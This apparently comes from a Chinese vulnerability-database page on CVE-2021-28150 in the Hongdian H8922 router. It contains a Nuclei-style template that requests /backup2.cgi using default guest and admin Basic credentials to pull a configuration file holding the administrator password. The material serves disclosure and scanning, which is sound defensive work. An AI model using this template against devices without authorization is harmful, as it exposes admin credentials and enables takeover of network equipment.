CVE-2021-28150: Hongdian H8922 3.0.5 - Information Disclosure

日期: 2025-08-01 | 影响软件: Hongdian H8922 | POC: 已公开

漏洞描述

Hongdian H8922 3.0.5 is susceptible to information disclosure. An attacker can access cli.conf (with the administrator password and other sensitive data) via /backup2.cgi and thereby possibly obtain sensitive information, modify data, and/or execute unauthorized operations.

PoC代码[已公开]

id: CVE-2021-28150

info:
  name: Hongdian H8922 3.0.5 - Information Disclosure
  author: gy741
  severity: medium
  description: Hongdian H8922 3.0.5 is susceptible to information disclosure. An attacker can access cli.conf (with the administrator password and other sensitive data) via /backup2.cgi and thereby possibly obtain sensitive information, modify data, and/or execute unauthorized operations.
  impact: |
    Successful exploitation of this vulnerability can lead to the exposure of sensitive data, potentially compromising the confidentiality of the system and its users.
  remediation: |
    Apply the latest security patch or update provided by Hongdian to fix the information disclosure vulnerability (CVE-2021-28150).
  reference:
    - https://ssd-disclosure.com/ssd-advisory-hongdian-h8922-multiple-vulnerabilities/
    - http://en.hongdian.com/Products/Details/H8922
    - https://nvd.nist.gov/vuln/detail/CVE-2021-28150
    - https://github.com/SexyBeast233/SecBooks
    - https://github.com/Threekiii/Awesome-POC
  classification:
    cvss-metrics: CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N
    cvss-score: 5.5
    cve-id: CVE-2021-28150
    cwe-id: CWE-425
    epss-score: 0.43493
    epss-percentile: 0.97436
    cpe: cpe:2.3:o:hongdian:h8922_firmware:3.0.5:*:*:*:*:*:*:*
  metadata:
    max-request: 2
    vendor: hongdian
    product: h8922_firmware
  tags: cve2021,cve,hongdian,exposure

http:
  - raw:
      - |
        GET /backup2.cgi HTTP/1.1
        Host: {{Hostname}}
        Authorization: Basic Z3Vlc3Q6Z3Vlc3Q=
      - |
        GET /backup2.cgi HTTP/1.1
        Host: {{Hostname}}
        Authorization: Basic YWRtaW46YWRtaW4=

    matchers-condition: and
    matchers:
      - type: word
        part: header
        words:
          - "application/octet-stream"

      - type: word
        part: body
        words:
          - "CLI configuration saved from vty"
          - "service webadmin"

      - type: status
        status:
          - 200
# digest: 490a00463044022033968be5df5f1880698c2eb65856552e3f014b366f7396c1158cb45bbee2f700022021fd68748834f56862b6c3693b231b7ecc9ed41fc03b22f03e4d54ce10813575:922c64590222798bb761d5b6d8e72950

相关漏洞推荐